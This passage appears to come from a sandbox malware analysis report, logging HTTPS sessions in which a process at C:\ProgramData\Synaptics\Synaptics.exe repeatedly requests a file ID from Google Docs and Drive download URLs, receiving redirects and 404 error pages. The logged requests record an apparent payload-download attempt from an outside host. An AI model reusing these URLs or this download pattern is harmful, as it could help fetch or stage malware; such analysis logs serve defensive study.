                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              101192.168.2.449884142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:24 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-buboQlgCreZKW8eQGUb_OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              102192.168.2.449886142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:24 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC43StYh49ff4b_3EvbR9uWH3FwqxE1vlNzd-1fj6bPklsmRTD_2xVzDUsDIEyPIMELBxz8G40E
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:24 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-y20FqzOOEE1FCtyV9Bw9_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:24 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:24 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 78 50 6f 67 5a 6e 6f 32 57 32 76 77 49 78 6e 79 62 58 48 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="RxPogZno2W2vwIxnybXH8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:24 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              103192.168.2.449889142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:24 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:25 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-92-vd2UoZR_D8Hl8xBc1TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              104192.168.2.449890142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:24 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:25 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-PsQ5QENwt_0Z_CCafnCIWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              105192.168.2.449891142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4uzHCCA7UoSH1C6V6vMQiLe-SMCS2KA5QtyymzHvcbkjw9Xz9iYLsDst2QGMoNJolY
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:25 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-R__6xnqNscxuFlo-Jmhj-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 79 39 47 65 59 6b 75 54 68 54 44 36 64 58 39 79 52 49 61 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="0y9GeYkuThTD6dX9yRIayg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              106192.168.2.449892142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6csT7DbYDuOMUGduv6Nu6YyOM-q4kN3nuPOXouqhgBwc6PHNu1XmdQyi7-gKuWQVOvOYUKMng
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:25 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-T2mg1Hu8MPenIb7avuC6jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 53 67 6a 59 5a 78 58 32 6f 79 38 50 41 4d 71 42 55 50 44 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="vSgjYZxX2oy8PAMqBUPDWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              107192.168.2.449893142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:26 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-I6KrwvlAg49LFI3QMOEQ_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              108192.168.2.449894142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:26 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
